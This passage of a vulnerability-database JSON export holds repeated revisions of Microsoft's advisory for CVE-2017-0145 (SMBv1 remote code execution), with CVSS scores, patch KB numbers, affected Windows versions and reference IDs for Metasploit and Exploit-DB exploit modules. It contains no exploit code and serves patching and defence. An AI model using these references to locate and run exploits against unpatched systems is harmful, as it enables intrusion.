["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27613"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-03T20:42:24", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-03T20:42:24", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012216", "KB4012606", "KB4012215", "KB3212646", "KB4013429", "KB4014077", "KB3205401", "KB4012213", "KB4012212", "KB4012217", "KB3205409", "KB4012598", "KB3210721", "KB4012214", "KB3177186", "KB4013198", "KB3210720", "KB3213986", "KBMS16-110, 3187754"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-03T20:42:24", "differentElements": ["msAffectedSoftware"], "edition": 6}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-04T06:47:20", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:142181"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-33895"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-04T06:47:20", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-04T06:47:20", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012598", "KB3205409", "KB4014077", "KB3177186", "KB4012217", "KB4012215", "KB3213986", "KB3212646", "KB4012213", "KB4013429", "KB3205401", "KB4013198", "KB4012214", "KB4012606", "KBMS16-110, 3187754", "KB3210721", "KB3210720", "KB4012216", "KB4012212"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-04T06:47:20", "differentElements": ["msAffectedSoftware"], "edition": 7}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-04T08:55:45", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-27752"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-04T08:55:45", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-04T08:55:45", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012213", "KB4012217", "KB4012212", "KB4012214", "KB4012216", "KB3212646", "KBMS16-110, 3187754", "KB4013198", "KB4014077", "KB3210720", "KB4012215", "KB3213986", "KB4013429", "KB3205409", "KB4012606", "KB4012598", "KB3177186", "KB3205401", "KB3210721"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 